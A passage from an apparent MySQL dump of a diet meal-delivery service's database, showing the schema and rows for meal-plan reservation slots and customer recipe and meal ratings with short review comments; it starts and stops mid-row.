open_sans\"><br><strong>Stop, Change or Hold</strong></p>\n                                        <p class=\"default_text text-left open_sans\">You may stop your order temporarily or permanently, make changes to your meal plan, or re-start your order by contacting via phone 0332 222 3429,\n                                            or text us on our social channels\n                                        </p>\n                                    ',1,NULL,NULL);

--
-- Table structure for table `pre_reservations`
--

CREATE TABLE `pre_reservations` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `breakfast_id` int(11) DEFAULT NULL,
  `lunch_id` int(11) DEFAULT NULL,
  `snack_id` int(11) DEFAULT NULL,
  `dinner_id` int(11) DEFAULT NULL,
  `meal_plan_id` int(11) NOT NULL,
  `sort` int(11) NOT NULL DEFAULT '0',
  `user_id` int(11) DEFAULT NULL,
  `active` tinyint(1) DEFAULT NULL,
  `deleted_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `pre_reservations_breakfast_id` (`breakfast_id`),
  KEY `pre_reservations_lunch_id` (`lunch_id`),
  KEY `pre_reservations_snack_id` (`snack_id`),
  KEY `pre_reservations_dinner_id` (`dinner_id`),
  KEY `pre_reservations_meal_plan_id` (`meal_plan_id`)
) ENGINE=InnoDB AUTO_INCREMENT=122 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `pre_reservations`
--

INSERT INTO `pre_reservations` VALUES (2,100099,100489,100176,100496,8,1,23,NULL,NULL,'2021-10-15 22:27:24','2023-04-19 10:08:06'),(3,100419,100294,100563,100553,8,2,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 10:24:50'),(4,100370,100411,100198,100555,8,3,23,NULL,NULL,'2021-10-18 16:04:20','2023-03-14 22:49:34'),(5,100236,100295,100453,100599,8,4,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 10:30:49'),(6,100482,100418,100600,100500,8,5,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 10:41:44'),(7,100562,100106,100453,100601,8,6,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:05:45'),(8,100205,100297,100176,100143,8,7,23,NULL,NULL,'2021-10-18 16:04:20','2023-03-14 23:28:44'),(9,100195,100296,100176,100107,8,8,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:25:56'),(10,100427,100596,100176,100497,8,9,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:28:04'),(11,100268,100287,100440,100432,8,10,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:36:17'),(12,100434,100566,100441,100301,8,11,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:34:38'),(13,100481,100189,100453,100490,8,12,23,NULL,NULL,'2021-10-18 16:04:20','2023-03-15 00:19:41'),(14,100286,100428,100222,100531,8,13,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:42:07'),(15,100118,100098,100563,100508,8,14,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:44:24'),(16,100598,100547,100176,100417,8,15,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:46:28'),(17,NULL,100512,100274,100266,17,1,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:04:26'),(18,NULL,100527,100273,100513,17,2,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:19:19'),(19,NULL,100299,100273,100244,17,3,4,NULL,NULL,'2021-10-18 16:05:12','2021-10-24 21:25:22'),(20,NULL,100522,100273,100516,17,4,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:34:58'),(21,NULL,100511,100274,100523,17,5,23,NULL,NULL,'2021-10-18 16:05:12','2022-08-30 01:54:37'),(22,NULL,100252,100274,100515,17,6,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:22:50'),(23,NULL,100254,100273,100255,17,7,4,NULL,NULL,'2021-10-18 16:05:12','2021-10-24 21:56:39'),(24,NULL,100346,100274,100519,17,8,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:30:37'),(25,NULL,100267,100273,100514,17,9,23,NULL,NULL,'2021-10-18 16:05:12','2022-08-30 01:39:14'),(26,NULL,100518,100274,100280,17,10,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:28:01'),(27,NULL,100275,100273,100303,17,11,4,NULL,NULL,'2021-10-18 16:05:12','2021-10-24 22:14:11'),(28,NULL,100371,100274,100524,17,12,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:37:36'),(29,NULL,100282,100225,100517,17,13,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:26:00'),(30,NULL,100291,100274,100567,17,14,23,NULL,NULL,'2021-10-18 16:05:12','2022-08-30 01:20:16'),(31,NULL,100306,100274,100521,17,15,23,NULL,NULL,'2021-10-18 16:05:12','2022-03-31 00:34:06'),(32,NULL,100489,100563,NULL,10,1,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-19 10:10:47'),(33,NULL,100294,100563,NULL,10,2,23,NULL,NULL,'2021-10-18 16:05:18','2022-09-24 00:54:25'),(34,NULL,100411,100198,NULL,10,3,23,NULL,NULL,'2021-10-18 16:05:18','2023-03-14 22:55:41'),(35,NULL,100295,100441,NULL,10,4,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-19 10:32:18'),(36,NULL,100500,100563,NULL,10,5,23,NULL,NULL,'2021-10-18 16:05:18','2023-03-14 23:11:13'),(37,NULL,100601,100441,NULL,10,6,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-19 11:06:12'),(38,NULL,100143,100194,NULL,10,7,23,NULL,NULL,'2021-10-18 16:05:18','2023-03-14 23:28:42'),(39,NULL,100107,100441,NULL,10,8,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-19 11:25:49'),(40,NULL,100497,100441,NULL,10,9,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-19 11:29:15'),(41,NULL,100287,100440,NULL,10,10,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-19 11:36:11'),(42,NULL,100566,100453,NULL,10,11,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-29 22:36:05'),(43,NULL,100189,100441,NULL,10,12,23,NULL,NULL,'2021-10-18 16:05:18','2023-03-15 00:19:37'),(44,NULL,100428,100222,NULL,10,13,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-29 22:41:58'),(45,NULL,100098,100563,NULL,10,14,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-29 22:44:21'),(46,NULL,100547,100441,NULL,10,15,23,NULL,NULL,'2021-10-18 16:05:18','2023-04-29 22:49:56'),(47,NULL,100489,100563,100496,14,1,23,NULL,NULL,'2021-10-18 16:05:33','2023-04-19 10:11:36'),(48,NULL,100294,100563,100553,14,2,23,NULL,NULL,'2021-10-18 16:05:33','2023-04-19 10:25:28'),(49,NULL,100411,100198,100555,14,3,23,NULL,NULL,'2021-10-18 16:05:33','2023-03-25 09:54:32'),(50,NULL,100295,100563,100599,14,4,23,NULL,NULL,'2021-10-18 16:05:33','2023-04-19 10:31:48'),(51,NULL,100418,100600,100500,14,5,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-19 10:42:23'),(52,NULL,100106,100563,100601,14,6,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-19 11:05:55'),(53,NULL,100297,100176,100143,14,7,23,NULL,NULL,'2021-10-18 16:05:34','2023-03-14 23:28:39'),(54,NULL,100296,100441,100107,14,8,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-19 11:25:52'),(55,NULL,100596,100441,100497,14,9,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-19 11:28:26'),(56,NULL,100287,100440,100432,14,10,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-19 11:36:12'),(57,NULL,100566,100441,100301,14,11,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-29 22:35:24'),(58,NULL,100189,100441,100490,14,12,23,NULL,NULL,'2021-10-18 16:05:34','2023-03-15 00:19:35'),(59,NULL,100428,100222,100531,14,13,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-29 22:42:01'),(60,NULL,100098,100563,100508,14,14,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-29 22:44:28'),(61,NULL,100547,100563,100417,14,15,23,NULL,NULL,'2021-10-18 16:05:34','2023-04-29 22:46:15'),(62,100265,100512,100273,100266,16,1,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:03:58'),(63,100526,100527,100273,100513,16,2,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:18:56'),(64,100243,100299,100273,100244,16,3,4,NULL,NULL,'2021-10-18 16:05:52','2021-10-24 21:26:12'),(65,100246,100522,100225,100516,16,4,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:34:41'),(66,100568,100511,100274,100523,16,5,23,NULL,NULL,'2021-10-18 16:05:52','2022-08-30 01:51:36'),(67,100251,100252,100274,100515,16,6,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:22:24'),(68,100259,100254,100273,100255,16,7,4,NULL,NULL,'2021-10-18 16:05:52','2021-10-24 21:55:06'),(69,100258,100346,100274,100519,16,8,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:29:54'),(70,100271,100267,100273,100514,16,9,23,NULL,NULL,'2021-10-18 16:05:52','2022-08-30 01:40:17'),(71,100281,100518,100274,100280,16,10,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:28:42'),(72,100278,100275,100273,100303,16,11,4,NULL,NULL,'2021-10-18 16:05:52','2021-10-24 22:14:14'),(73,100250,100371,100274,100524,16,12,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:37:02'),(74,100251,100282,100225,100517,16,13,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:25:27'),(75,100250,100291,100273,100567,16,14,23,NULL,NULL,'2021-10-18 16:05:52','2022-08-30 01:17:14'),(76,100368,100306,100274,100521,16,15,23,NULL,NULL,'2021-10-18 16:05:52','2022-03-31 00:33:45'),(92,100372,100572,100374,100379,18,1,23,NULL,NULL,'2021-11-15 13:54:04','2022-09-24 00:32:55'),(93,100376,100393,100374,100396,18,2,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-24 23:51:24'),(94,100378,100571,100576,100377,18,3,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-24 23:56:44'),(95,100574,100577,100374,100575,18,4,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:01:54'),(96,100210,100387,100374,100388,18,5,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:04:46'),(97,100591,100383,100374,100375,18,6,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:11:36'),(98,100592,100384,100374,100570,18,7,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:22:19'),(99,100333,100400,100374,100538,18,8,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:31:26'),(100,100578,100582,100374,100398,18,9,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:34:56'),(101,100372,100399,100374,100379,18,10,23,NULL,NULL,'2021-11-17 14:06:59','2022-09-25 00:40:09'),(102,100099,100489,100176,100496,9,1,23,NULL,NULL,'2021-10-15 22:27:24','2023-04-19 10:11:52'),(103,100419,100294,100563,100553,9,2,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 10:25:46'),(104,100370,100411,100198,100555,9,3,23,NULL,NULL,'2021-10-18 16:04:20','2023-03-14 22:58:14'),(105,100236,100295,100453,100599,9,4,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 10:31:31'),(106,100482,100418,100600,100500,9,5,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 10:42:09'),(107,100562,100106,100453,100601,9,6,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:05:51'),(108,100205,100297,100176,100143,9,7,23,NULL,NULL,'2021-10-18 16:04:20','2023-03-14 23:28:46'),(109,100195,100296,100176,100107,9,8,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:25:54'),(110,100427,100596,100176,100497,9,9,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:28:12'),(111,100268,100287,100440,100432,9,10,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-19 11:36:14'),(112,100434,100566,100441,100301,9,11,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:35:02'),(113,100481,100189,100453,100490,9,12,23,NULL,NULL,'2021-10-18 16:04:20','2023-03-15 00:19:39'),(114,100286,100428,100222,100531,9,13,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:42:04'),(115,100118,100098,100563,100508,9,14,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:44:26'),(116,100598,100547,100176,100417,9,15,23,NULL,NULL,'2021-10-18 16:04:20','2023-04-29 22:46:24'),(117,100210,100551,100595,100401,18,11,23,NULL,NULL,'2022-09-06 07:28:28','2022-12-03 23:30:48'),(118,100586,100585,100374,100584,18,12,23,NULL,NULL,'2022-09-06 07:28:37','2022-09-08 00:12:56'),(119,100587,100580,100374,100538,18,13,23,NULL,NULL,'2022-09-06 07:28:46','2022-09-08 00:48:12'),(120,100588,100388,100374,100394,18,14,23,NULL,NULL,'2022-09-06 07:29:24','2022-09-08 00:55:06'),(121,100578,100589,100374,100590,18,15,23,NULL,NULL,'2022-09-06 07:29:39','2022-09-08 01:10:46');

--
-- Table structure for table `ratings`
--

CREATE TABLE `ratings` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `objectId` int(11) NOT NULL,
  `reason_id` int(11) NOT NULL,
  `object` enum('meals','recipes','dietbox') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'meals',
  `status` enum('approved','pending','rejected') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'pending',
  `member_id` int(11) NOT NULL,
  `comment` varchar(500) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `rate` double(8,2) NOT NULL DEFAULT '0.00',
  `sorting` int(11) DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT '1',
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  `deleted_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=460 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `ratings`
--

INSERT INTO `ratings` VALUES (1,53,0,'recipes','pending',100098,'',4.00,NULL,1,'2019-11-18 22:24:15','2019-11-18 22:24:15',NULL),(2,11,0,'recipes','pending',3,'Made with eggs, bread, onions, chilies and herbs. It is one of the most popular street foods from India. It is very much eaten in all regions as a breakfast or fast food.',5.00,NULL,1,'2019-12-17 04:37:32','2019-12-17 04:37:32',NULL),(3,18,0,'recipes','pending',2,'Chicken Chilli Dry is one of the popular Pakistani-Chinese style chicken meal that is served in Chinese restaurants across the world',5.00,NULL,1,'2019-12-17 09:11:09','2019-12-17 09:11:09',NULL),(4,19,0,'recipes','pending',3,'Chicken karahi, also known as gosht karahi and kadai chicken is a Pakistani and North Indian dish noted for its spicy taste.',5.00,NULL,1,'2019-12-17 18:08:42','2019-12-17 18:08:42',NULL),(5,36,0,'recipes','pending',3,'A world-renowned Indian dish, it is worth every bit of the effort. They cooked Biryani over a low flame',5.00,NULL,1,'2019-12-18 17:31:55','2019-12-27 22:49:58',NULL),(6,21,0,'recipes','pending',1,'test test',5.00,NULL,1,'2019-12-18 17:40:35','2019-12-18 17:40:35',NULL),(7,21,0,'recipes','pending',3,'woww',5.00,NULL,1,'2019-12-18 17:43:53','2019-12-18 17:43:53',NULL),(8,13,0,'recipes','pending',3,'woww',5.00,NULL,1,'2019-12-18 17:44:19','2019-12-18 17:44:19',NULL),(9,21,0,'recipes','pending',3,'wow',4.00,NULL,1,'2019-12-18 17:44:35','2019-12-18 17:44:35',NULL),(10,63,0,'recipes','pending',2,'Taste is good never feels like I am on diet, lose 3 kg in 18 days',0.00,NULL,1,'2019-12-20 04:37:32','2019-12-20 04:37:32',NULL),(11,63,0,'recipes','pending',3,'',5.00,NULL,1,'2019-12-21 08:51:46','2019-12-21 08:51:46',NULL),(12,63,0,'recipes','pending',3,'',5.00,NULL,1,'2019-12-21 08:51:53','2019-12-21 08:51:53',NULL),(13,33,0,'recipes','pending',3,'',5.00,NULL,1,'2019-12-21 08:52:13','2019-12-21 08:52:13',NULL),(14,48,0,'recipes','pending',3,'',5.00,NULL,1,'2019-12-21 08:52:28','2019-12-21 08:52:28',NULL),(15,53,0,'recipes','pending',3,'',5.00,NULL,1,'2019-12-21 08:52:37','2019-12-21 08:52:37',NULL),(16,14,0,'recipes','pending',2,'Menu and ingredients not as per mention...',4.00,NULL,1,'2019-12-22 06:49:07','2019-12-22 06:49:07',NULL),(17,16,0,'recipes','pending',3,'',5.00,NULL,1,'2019-12-23 20:43:19','2019-12-23 20:43:19',NULL),(18,31,0,'recipes','pending',4,'serving could be a bit more.',4.00,NULL,1,'2020-01-20 15:43:03','2020-01-20 15:43:03',NULL),(19,40,0,'recipes','pending',4,'very good, thanks :) \nserving could be a bit more ',4.00,NULL,1,'2020-01-21 14:33:59','2020-01-21 14:33:59',NULL),(20,77,0,'recipes','pending',4,'very good ?',4.00,NULL,1,'2020-01-21 14:34:26','2020-01-21 14:34:26',NULL),(21,43,0,'recipes','pending',1,'its good',5.00,NULL,1,'2020-01-21 21:46:47','2020-01-21 21:46:47',NULL),(22,89,0,'recipes','pending',4,'',5.00,NULL,1,'2020-01-22 14:48:47','2020-01-22 14:48:47',NULL),(23,64,0,'recipes','pending',4,'loved it :)',5.00,NULL,1,'2020-01-22 14:49:16','2020-01-22 14:49:16',NULL),(24,44,0,'recipes','pending',4,'',5.00,NULL,1,'2020-02-03 04:56:15','2020-02-03 04:56:15',NULL),(25,91,0,'recipes','pending',4,'',5.00,NULL,1,'2020-02-03 04:56:25','2020-02-03 04:56:25',NULL),(26,89,0,'recipes','pending',4,'',5.00,NULL,1,'2020-02-05 15:42:06','2020-02-05 15:42:06',NULL),(27,64,0,'recipes','pending',4,'',5.00,NULL,1,'2020-02-05 15:42:27','2020-02-05 15:42:27',NULL),(28,30,0,'recipes','pending',8,'the egg was delicious but it was fridge cold and the bread was not fresh, it was falling apart as soon as I took it out of the box',3.00,NULL,1,'2020-02-08 06:02:41','2020-02-08 06:02:41',NULL),(29,20,0,'recipes','pending',8,'',5.00,NULL,1,'2020-02-08 06:03:08','2020-02-08 06:03:08',NULL),(30,43,0,'recipes','pending',8,'The beef was dry making the whole burrito dry',3.00,NULL,1,'2020-02-08 06:05:13','2020-02-08 06:05:13',NULL),(31,87,0,'recipes','pending',8,'',5.00,NULL,1,'2020-02-08 06:05:53','2020-02-08 06:05:53',NULL),(32,65,0,'recipes','pending',8,'',5.00,NULL,1,'2020-02-08 06:05:58','2020-02-08 06:05:58',NULL),(33,1,0,'recipes','pending',1,'test test',5.00,NULL,1,'2020-02-15 18:22:19','2020-02-15 18:22:19',NULL),(34,12,0,'recipes','pending',17,'yummy??',5.00,NULL,1,'2020-02-16 07:38:44','2020-02-16 07:38:44',NULL),(35,57,0,'recipes','pending',17,'',5.00,NULL,1,'2020-02-17 17:37:18','2020-02-17 17:37:18',NULL),(36,91,0,'recipes','pending',17,'healthy ',4.00,NULL,1,'2020-02-17 17:40:02','2020-02-17 17:40:02',NULL),(37,25,0,'recipes','pending',17,'',3.00,NULL,1,'2020-02-17 17:43:41','2020-02-17 17:43:41',NULL),(38,42,0,'recipes','pending',17,'',5.00,NULL,1,'2020-02-17 17:45:13','2020-02-17 17:45:13',NULL),(39,46,0,'recipes','pending',17,'',5.00,NULL,1,'2020-02-17 17:46:08','2020-02-17 17:46:08',NULL),(40,77,0,'recipes','pending',17,'i didnt get this.',0.00,NULL,1,'2020-02-18 03:38:34','2020-02-18 03:38:34',NULL),(41,84,0,'recipes','pending',17,'i didnt get this.',0.00,NULL,1,'2020-02-18 03:39:16','2020-02-18 03:39:16',NULL),(42,29,0,'recipes','pending',17,'',4.00,NULL,1,'2020-02-19 03:34:41','2020-02-19 03:34:41',NULL),(43,89,0,'recipes','pending',17,'not good cocoa taste is so bitter',1.00,NULL,1,'2020-02-19 13:40:30','2020-02-19 13:40:30',NULL),(44,29,0,'recipes','pending',20,'',5.00,NULL,1,'2020-02-19 15:08:34','2020-02-19 15:08:34',NULL),(45,39,0,'recipes','pending',17,'yummy?',5.00,NULL,1,'2020-02-20 09:11:51','2020-02-20 09:11:51',NULL),(46,82,0,'recipes','pending',17,'',5.00,NULL,1,'2020-02-21 13:10:05','2020-02-21 13:10:05',NULL),(47,22,0,'recipes','pending',17,'',5.00,NULL,1,'2020-02-21 13:10:24','2020-02-21 13:10:24',NULL),(48,17,0,'recipes','pending',17,'',5.00,NULL,1,'2020-02-21 13:11:05','2020-02-21 13:11:05',NULL),(49,89,0,'recipes','pending',11,'good good',5.00,NULL,1,'2020-02-21 22:08:52','2020-02-21 22:09:52',NULL),(50,50,0,'recipes','pending',19,'',5.00,NULL,1,'2020-03-05 15:06:21','2020-03-05 15:06:21',NULL),(51,19,0,'recipes','pending',38,'Hi, just want to give you guys a review about your services. I loved everything you guys delivered, super tasty even my family loves it ? since it had reasonable quantity so everytime I would share with my family also I would like to appreciate rider\'s punctuality always on time. Everything was up to the mark. I highly recommend your diet food.',5.00,NULL,1,'2020-03-02 00:00:00',NULL,NULL),(52,1,0,'recipes','pending',1,'ftuuui',4.00,NULL,1,'2020-04-12 17:59:58','2020-04-12 17:59:58',NULL),(53,1,0,'recipes','pending',1,'ftuuui',4.00,NULL,1,'2020-04-12 18:01:33','2020-04-12 18:01:33',NULL),(54,1,0,'recipes','pending',1,'hjgffkj',5.00,NULL,1,'2020-04-12 18:06:19','2020-04-12 18:06:19',NULL),(55,1,0,'recipes','pending',1,'hhgfrth',4.00,NULL,1,'2020-04-12 18:09:10','2020-04-12 18:09:10',NULL),(56,11,0,'recipes','pending',1,'yhgfffuj\n',5.00,NULL,1,'2020-04-12 18:12:15','2020-04-12 18:12:15',NULL),(57,11,0,'recipes','pending',1,'hgffth',2.00,NULL,1,'2020-04-12 18:12:38','2020-04-12 18:12:38',NULL),(58,11,0,'recipes','pending',1,'hhhhffgb\n',4.00,NULL,1,'2020-04-12 18:13:45','2020-04-12 18:13:45',NULL),(59,40,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-03 08:38:18','2020-06-03 08:38:18',NULL),(60,61,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-03 08:38:58','2020-06-03 08:38:58',NULL),(61,106,0,'recipes','pending',73,'',4.00,NULL,1,'2020-06-03 19:04:53','2020-06-03 19:04:53',NULL),(62,71,0,'recipes','pending',65,'It had an unpleasant taste and smell.',0.00,NULL,1,'2020-06-04 08:51:00','2020-06-04 08:51:00',NULL),(63,71,0,'recipes','pending',66,'the taste and smell was very unpleasant and I wasn\'t able to eat it at all!',1.00,NULL,1,'2020-06-04 08:52:12','2020-06-04 08:52:12',NULL),(64,71,0,'recipes','pending',65,'',0.00,NULL,1,'2020-06-04 08:52:12','2020-06-04 08:52:12',NULL),(65,42,0,'recipes','pending',65,'',5.00,NULL,1,'2020-06-04 08:52:40','2020-06-04 08:52:40',NULL),(66,133,0,'recipes','pending',65,'',0.00,NULL,1,'2020-06-04 08:53:26','2020-06-04 08:53:26',NULL),(67,101,0,'recipes','pending',65,'Didnt like the taste',0.00,NULL,1,'2020-06-06 12:35:28','2020-06-06 12:35:28',NULL),(68,97,0,'recipes','pending',78,'loved this mildly sweet snack. I can eat it everyday.\n',5.00,NULL,1,'2020-06-08 18:38:59','2020-06-08 18:38:59',NULL),(69,51,0,'recipes','pending',78,'I have never eaten such a yummy burger in my life. ',5.00,NULL,1,'2020-06-09 11:07:40','2020-06-09 11:07:40',NULL),(70,19,0,'recipes','pending',78,'chicken was cooked perfectly. the roti won. so soft and tasty. loved it',5.00,NULL,1,'2020-06-09 17:03:33','2020-06-09 20:10:03',NULL),(71,71,0,'recipes','pending',72,'',0.00,NULL,1,'2020-06-11 14:54:10','2020-06-11 14:54:10',NULL),(72,133,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-11 14:54:37','2020-06-11 14:54:37',NULL),(73,109,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-11 14:54:48','2020-06-11 14:54:48',NULL),(74,57,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-11 14:55:02','2020-06-11 14:55:02',NULL),(75,100,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-11 14:55:18','2020-06-11 14:55:18',NULL),(76,71,0,'recipes','pending',72,'',0.00,NULL,1,'2020-06-11 14:55:28','2020-06-11 14:55:28',NULL),(77,64,0,'recipes','pending',72,'',5.00,NULL,1,'2020-06-11 14:55:46','2020-06-11 14:55:46',NULL),(78,48,0,'recipes','pending',65,'',5.00,NULL,1,'2020-06-13 20:15:27','2020-06-13 20:15:27',NULL),(79,53,0,'recipes','pending',65,'There were no mashes potatoes in today\'s meal.\n',0.00,NULL,1,'2020-06-13 20:16:31','2020-06-13 20:16:31',NULL),(80,44,0,'recipes','pending',65,'it was not cooked properly',2.00,NULL,1,'2020-06-13 20:17:17','2020-06-13 20:17:17',NULL),(81,46,0,'recipes','pending',65,'',2.00,NULL,1,'2020-06-13 20:17:32','2020-06-13 20:17:32',NULL),(82,100,0,'recipes','pending',65,'',5.00,NULL,1,'2020-06-13 20:17:55','2020-06-13 20:17:55',NULL),(83,71,0,'recipes','pending',60,'remove cauliflower from salad please',1.00,NULL,1,'2020-07-17 19:35:44','2020-07-17 19:35:44',NULL),(84,29,0,'recipes','pending',3,'love it',5.00,NULL,1,'2020-07-23 13:08:53','2020-07-23 13:08:53',NULL),(85,99,0,'recipes','pending',3,'love it',5.00,NULL,1,'2020-07-23 13:13:14','2020-07-23 13:13:14',NULL),(86,94,0,'recipes','pending',137,'delicious',5.00,NULL,1,'2020-09-04 04:55:45','2020-09-04 04:55:45',NULL),(87,38,0,'recipes','pending',149,'beef was not done not good ',1.00,NULL,1,'2020-09-08 21:52:04','2020-09-08 21:52:04',NULL),(88,82,0,'recipes','pending',149,'smell like going bad',1.00,NULL,1,'2020-09-08 21:52:36','2020-09-08 21:52:36',NULL),(89,109,0,'recipes','pending',149,'it was ok',3.00,NULL,1,'2020-09-08 21:54:37','2020-09-08 21:54:37',NULL),(90,151,0,'recipes','pending',148,'I cant eat cauliflower rice. it tastes awful. so plz change it for me.',1.00,NULL,1,'2020-09-10 09:05:28','2020-09-10 09:05:28',NULL),(91,134,0,'recipes','pending',207,'y did i recive a stake rather then butter xhicken????,',1.00,NULL,1,'2020-10-20 15:57:56','2020-10-20 15:57:56',NULL),(92,132,0,'recipes','pending',207,'the sauce was absolute night mare was the same sauce u sent with nuggets it was just really bad . .. plus where was the broccoli???? these was not even a single peice of it',1.00,NULL,1,'2020-10-20 15:59:15','2020-10-20 15:59:15',NULL),(93,151,0,'recipes','pending',258,'Taste is not good ??',1.00,NULL,1,'2020-12-02 11:55:21','2020-12-02 11:55:21',NULL),(94,13,0,'recipes','pending',277,'would be interested to know the quantity of eggs that were included in the dish? and also were they egg whites only or not?',5.00,NULL,1,'2020-12-16 05:24:59','2020-12-16 05:24:59',NULL),(95,40,0,'recipes','pending',277,'very nice',5.00,NULL,1,'2020-12-21 08:08:35','2020-12-21 08:08:35',NULL),(96,89,0,'recipes','pending',290,'did not receive coffee today\n',1.00,NULL,1,'2021-01-16 15:02:16','2021-01-16 15:02:16',NULL),(97,79,0,'recipes','pending',324,'it\'s missing in my bf ',1.00,NULL,1,'2021-01-24 05:58:34','2021-01-24 05:58:34',NULL),(98,10388,0,'meals','pending',11,'good',3.00,NULL,1,'2020-02-21 22:07:50','2020-02-21 22:07:50',NULL),(99,12295,0,'meals','pending',43,'Not for me',1.00,NULL,1,'2020-03-20 11:14:27','2020-03-20 11:14:27',NULL),(100,12336,0,'meals','pending',43,'Not a big fan but also not bad at all',3.00,NULL,1,'2020-03-20 11:15:22','2020-03-20 11:15:22',NULL),(101,12298,0,'meals','pending',43,'not a big beef fan',3.00,NULL,1,'2020-03-20 11:15:43','2020-03-20 11:15:43',NULL),(102,12268,0,'meals','pending',43,'Very Good',4.00,NULL,1,'2020-03-20 11:16:15','2020-03-20 11:16:15',NULL),(103,12262,0,'meals','pending',43,'Excellent',5.00,NULL,1,'2020-03-20 11:16:25','2020-03-20 11:16:25',NULL),(104,12227,0,'meals','pending',43,'Very Good',4.00,NULL,1,'2020-03-20 11:16:40','2020-03-20 11:16:40',NULL),(105,12227,0,'meals','pending',43,'Very Good',4.00,NULL,1,'2020-03-20 11:16:40','2020-03-20 11:16:40',NULL),(106,12224,0,'meals','pending',43,'Delicious',5.00,NULL,1,'2020-03-20 11:16:54','2020-03-20 11:16:54',NULL),(107,12194,0,'meals','pending',43,'the presentation was very very good',5.00,NULL,1,'2020-03-20 11:17:14','2020-03-20 11:17:14',NULL),(108,12191,0,'meals','pending',43,'very good',4.00,NULL,1,'2020-03-20 11:17:24','2020-03-20 11:17:24',NULL),(109,12141,0,'meals','pending',43,'good',4.00,NULL,1,'2020-03-20 11:17:34','2020-03-20 11:17:34',NULL),(110,12138,0,'meals','pending',43,'good',4.00,NULL,1,'2020-03-20 11:17:48','2020-03-20 11:17:48',NULL),(111,12138,0,'meals','pending',43,'good',4.00,NULL,1,'2020-03-20 11:26:11','2020-03-20 11:26:11',NULL),(112,100098,0,'meals','pending',1,'ftuuui',4.00,NULL,1,'2020-04-12 19:21:42','2020-04-12 19:21:42',NULL),(113,16044,0,'meals','pending',104,'it was a bit too 